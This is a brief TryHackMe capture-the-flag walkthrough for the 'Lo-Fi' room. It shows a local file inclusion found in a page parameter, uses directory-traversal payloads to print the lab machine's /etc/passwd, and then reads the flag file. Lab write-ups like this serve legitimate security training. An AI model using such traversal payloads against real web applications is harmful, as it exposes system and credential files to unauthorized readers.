Lo-Fi | TryHackMe | Walkthrough | Easy

Room: https://tryhackme.com/r/room/lofi

As mentioned in the challenge page, we just have to visit the url <Machine_IP>.

By looking around we immediately see in the “Discography” section, the links mentioned open like this

http://10.10.229.128/?page=relax.php

We immediately check for LFI and it works

http://10.10.229.128/?page=../../../../../etc/passwd

root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/bin/sh bin:x:2:2:bin:/bin:/bin/sh sys:x:3:3:sys:/dev:/bin/sh sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/bin/sh man:x:6:12:man:/var/cache/man:/bin/sh lp:x:7:7:lp:/var/spool/lpd:/bin/sh mail:x:8:8:mail:/var/mail:/bin/sh news:x:9:9:news:/var/spool/news:/bin/sh uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh proxy:x:13:13:proxy:/bin:/bin/sh www-data:x:33:33:www-data:/var/www:/bin/sh backup:x:34:34:backup:/var/backups:/bin/sh list:x:38:38:Mailing List Manager:/var/list:/bin/sh irc:x:39:39:ircd:/var/run/ircd:/bin/sh gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh nobody:x:65534:65534:nobody:/nonexistent:/bin/sh libuuid:x:100:101::/var/lib/libuuid:/bin/sh 

As mentioned on the challenge page, the flag is in the root of the system, so just have to

http://10.10.229.128/?page=../../../../../flag.txt

and we get the flag.

One of the easiest boxes ever!